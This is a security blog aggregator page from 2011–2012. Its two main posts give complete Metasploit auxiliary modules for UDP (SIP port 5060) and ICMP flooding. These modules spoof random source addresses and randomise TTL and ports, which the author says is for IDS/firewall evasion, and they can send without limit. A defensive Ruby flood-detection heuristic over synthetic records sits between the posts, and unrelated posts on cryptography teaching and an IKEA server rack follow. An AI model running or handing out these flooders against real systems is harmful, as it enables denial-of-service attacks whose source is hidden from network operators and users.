Planet Security

January 17, 2012

Jesús Pérez

My first Metasploit module: UDP Flooder

There are very few VoIP-related Metasploit modules, neither Auxiliaries nor Exploits, so I have in mind to write some of them in my free time. Today I want to share a UDP flooder Aux. module, which is very simple but perfect for learning. UDPFlooder is one of the many tools covered in the "Hacking VoIP Exposed" book, considered a reference in this field.

Code:

-------------------------------------------------------------------------
require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Auxiliary::Dos
  include Msf::Exploit::Capture

  def initialize
    super(
      'Name'        => 'UDP Flooder',
      'Description' => 'A simple UDP flooder',
      'Author'      => 'Jesus Perez',
      'License'     => MSF_LICENSE,
      'Version'     => '$Revision: 0 $'
    )

    register_options(
      [
        Opt::RPORT(5060),
        OptAddress.new('SHOST', [false, 'The spoofable source address (else randomizes)']),
        OptInt.new('SPORT', [false, 'The source port (else randomizes)']),
        OptInt.new('NUM', [false, 'Number of UDP packets to send (else unlimited)']),
        OptInt.new('SIZE', [false, 'Size of UDP packets to send (else 256 bytes)'])
      ], self.class)
    # Capture options that only matter when reading packets, not sending them.
    deregister_options('FILTER', 'PCAPFILE', 'SNAPLEN')
  end

  # Source port: the configured one, or a random port in 1..65535 on each call.
  def sport
    datastore['SPORT'].to_i.zero? ? rand(65535) + 1 : datastore['SPORT'].to_i
  end

  def rport
    datastore['RPORT'].to_i
  end

  # Source address: the configured one, or a random dotted quad on each call.
  def srchost
    datastore['SHOST'] || [rand(0x100000000)].pack('N').unpack('C*').join('.')
  end

  def size
    datastore['SIZE'].to_i.zero? ? 256 : datastore['SIZE'].to_i
  end

  def run
    open_pcap

    sent = 0
    # NUM is nil when the option is unset; nil.to_i is 0, which means unlimited.
    num = datastore['NUM'].to_i

    print_status("UDP flooding #{rhost}:#{rport}...")

    p = PacketFu::UDPPacket.new

    p.ip_daddr = rhost
    p.udp_dport = rport

    while (num <= 0) or (sent < num)
      # TTL, source address and source port are regenerated for every packet.
      p.ip_ttl = rand(128) + 128
      p.ip_saddr = srchost
      p.udp_sport = sport
      # Random base-36 string of at most SIZE characters.
      p.payload = rand(36**size).to_s(36)
      p.recalc
      capture_sendto(p, rhost)
      sent += 1
    end

    close_pcap
  end
end

--------------------------------------------------------------------------

Most of the code is taken from the Metasploit TCP SYN Flooder module, but I made some more changes besides adapting it to UDP. In the same way the TTL is changed in each packet, I prefer to change the source (spoofed) address too, for the same reason (IDS/firewall evasion). Moreover, in this case something to send is needed, so I added the new option SIZE, which determines the length of this random string. Another difference you could appreciate is that the option SNAPLEN is unregistered too, because it makes no sense in this module.


Figure: Usage information

Finally, in order to test whether the module works fine I'm going to sniff the interface and see, with the help of Wireshark, what is really happening. The next picture shows that everything seems to be working as defined in the description of the attack. :)



Figures: Sniffed packets

Jesús Pérez

posted by Jesús Pérez (noreply@blogger.com) at January 17, 2012 06:55 PM

Another simple Metasploit module: ICMP Flooder


Hi again! I said I was going to develop VoIP-related Metasploit modules, but I was reading the PacketFu documentation and found that writing an ICMP flooder couldn't be too complicated at this point. So I share this code too. I decided to include the SHOST and SIZE options too, trying to get a more flexible module able to perform different flavors of this attack such as Ping flood, Smurf or Ping of death. The next pictures show the module in the same way as in the last post.

Code:

-------------------------------------------------------------------------
require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Auxiliary::Dos
  include Msf::Exploit::Capture

  def initialize
    super(
      'Name'        => 'ICMP Flooder',
      'Description' => 'A simple ICMP flooder',
      'Author'      => 'Jesus Perez',
      'License'     => MSF_LICENSE,
      'Version'     => '$Revision: 0 $'
    )

    register_options(
      [
        OptAddress.new('SHOST', [false, 'The spoofable source address (else randomizes)']),
        OptInt.new('NUM', [false, 'Number of ping packets to send (else unlimited)']),
        OptInt.new('SIZE', [false, 'Size of ICMP packets to send (else 256 bytes)'])
      ], self.class)
    # Capture options that only matter when reading packets, not sending them.
    deregister_options('FILTER', 'PCAPFILE', 'SNAPLEN')
  end

  # Source address: the configured one, or a random dotted quad on each call.
  def srchost
    datastore['SHOST'] || [rand(0x100000000)].pack('N').unpack('C*').join('.')
  end

  def size
    datastore['SIZE'].to_i.zero? ? 256 : datastore['SIZE'].to_i
  end

  def run
    open_pcap

    sent = 0
    # NUM is nil when the option is unset; nil.to_i is 0, which means unlimited.
    num = datastore['NUM'].to_i

    print_status("ICMP flooding #{rhost}...")

    # ICMP type 8 / code 0 is an echo request ("ping").
    p = PacketFu::ICMPPacket.new
    p.icmp_type = 8
    p.icmp_code = 0
    p.ip_daddr = rhost

    while (num <= 0) or (sent < num)
      # Only the source address changes per packet; the TTL keeps PacketFu's default.
      p.ip_saddr = srchost
      # Random base-36 string of at most SIZE characters.
      p.payload = rand(36**size).to_s(36)
      p.recalc
      capture_sendto(p, rhost)
      sent += 1
    end

    close_pcap
  end
end

-------------------------------------------------------------------------
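Both modules above send a burst toward one host with a fresh source address on every packet, and the UDP one also rotates the TTL and source port. The following added example, which is not part of either post, shows the defender's side of that pattern: a Ruby heuristic run over constructed flow records that flags a (target, protocol, service) group by its distinct-source ratio and TTL spread; the Record fields, addresses and thresholds are this example's own assumptions.

```ruby
# Constructed flow records (not captured traffic); the field names are this
# example's own assumptions about what a sensor exports.
Record = Struct.new(:proto, :src, :sport, :dst, :dport, :ttl, :len)

VICTIM = '192.0.2.10'  # constructed addresses from the TEST-NET ranges
PBX    = '192.0.2.20'

# A burst shaped like the two modules: every packet has a fresh source
# address; UDP packets also get a random source port and a TTL in 128..255,
# while the ICMP echo requests keep PacketFu's default TTL of 64.
def synthetic_flood(proto, n)
  Array.new(n) do |i|
    src = "#{10 + i % 200}.#{(i * 7) % 256}.#{(i * 13) % 256}.#{(i * 31) % 256}"
    if proto == 'udp'
      Record.new('udp', src, 1024 + (i * 977) % 60_000, VICTIM, 5060, 128 + (i * 37) % 128, 256)
    else
      Record.new('icmp', src, nil, VICTIM, nil, 64, 256)
    end
  end
end

# Ordinary SIP traffic: three phones re-REGISTERing against a host, fixed TTL.
def synthetic_sip(dst, n)
  phones = %w[198.51.100.21 198.51.100.22 198.51.100.23]
  Array.new(n) { |i| Record.new('udp', phones[i % 3], 5060, dst, 5060, 64, 620) }
end

# Group by (target, protocol, service) and score each group on distinct sources
# per packet. Per-source rate limits never trigger on sources that never repeat,
# so that ratio is the signal (ingress filtering per BCP 38 removes the spoofed
# sources at the edge); TTL spread tells the UDP module apart from real hosts.
def detect_floods(records, min_packets: 100, spoof_ratio: 0.5)
  records.group_by { |r| [r.dst, r.proto, r.dport] }
         .each_with_object([]) do |((dst, proto, dport), pkts), findings|
    next if pkts.size < min_packets
    sources = pkts.map(&:src).uniq.size
    ratio   = sources.to_f / pkts.size
    next if ratio < spoof_ratio
    findings << { target: dst, proto: proto, dport: dport, packets: pkts.size,
                  distinct_sources: sources, source_ratio: ratio.round(2),
                  ttl_randomised: pkts.map(&:ttl).uniq.size > 16 }
  end
end

# Flood mixed with real traffic on the victim, plus a busy but benign PBX.
def demo
  traffic = synthetic_sip(PBX, 120) + synthetic_sip(VICTIM, 30) +
            synthetic_flood('udp', 300) + synthetic_flood('icmp', 300)
  detect_floods(traffic.shuffle(random: Random.new(1)))
end
demo.each { |f| puts f.inspect } if $PROGRAM_NAME == __FILE__
```

The busy PBX group (120 packets from 3 phones) stays below the ratio threshold, while both floods are reported even though the UDP one is interleaved with legitimate SIP traffic.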


Figure: Usage information


Figure: Sniffed packets

Jesús Pérez

posted by Jesús Pérez (noreply@blogger.com) at January 17, 2012 06:54 PM

December 15, 2011

Javier Muñoz

Physical Security & Cryptography at MSWL 2012

Great time at Master Software Libre teaching the Physical Security and Cryptography contents this year, two key areas in Information Security and Privacy.

These lessons were the first ones happening before my usual lessons on Networking, Security Networking and Linux Kernel.

In the Physical Security time we worked on well-known physical system security methodologies, together with two new relevant topics: environmental design, and the design and evaluation of physical protection systems.

It was a lesson covering broad and detailed topics, ranging from designing defensible spaces, where you are able to use different elements and aspects to get natural social control and crime prevention, to a full description of the technology and sensors available to protect different facilities. Security standards and some notes to understand social behaviour (the Bronx case study) were worked out too.

On Cryptography, we walked along its history and development in order to understand cryptographic models and current cryptographic systems, free/open software tooling, integration and usual use cases. At the end, everybody got their crypto stuff in place, ready to take part in keysigning parties and the next social community events.

Ah! I almost forgot. This year, students will elaborate on the right design to build a safe and secure physical protection system for one embassy.

posted by javier at December 15, 2011 05:14 PM

November 22, 2011

Jesús Pérez

Some posts on Flu-Project blog


I recently wrote two posts (in Spanish) on the Flu-Project blog about my recent experience at Hackmeeting 2011 (MeigHacks) and some of the issues I dealt with during my lecture, including W3af and SQLMap. These are the links:

- De paso por el Hackmeeting 2011
- Badstore, SQLi y otras chicas del montón


Jesús Pérez

posted by Jesús Pérez (noreply@blogger.com) at November 22, 2011 04:13 PM

November 19, 2011

Carlos López

IKEA Hackers: LackRack

Among the hundreds of hacks from the fantastic website IKEA Hackers, one is particularly interesting.

How do you build a rack from an IKEA Lack table that costs less than 10 euros?
Well, with this manual:

The best of the LackRack (after its price) is that its construction is modular and you can grow it with your needs:

5x LackRack

The LackRack is the ultimate, low-cost, high-shininess solution for your modular datacenter-in-the-living-room. It is said that Google engineers were the first to explore the idea of using Lack tables for data centers. The LackRack is so famous that it even has its own website: http://lackrack.org/ :D

posted by clopez at November 19, 2011 10:30 PM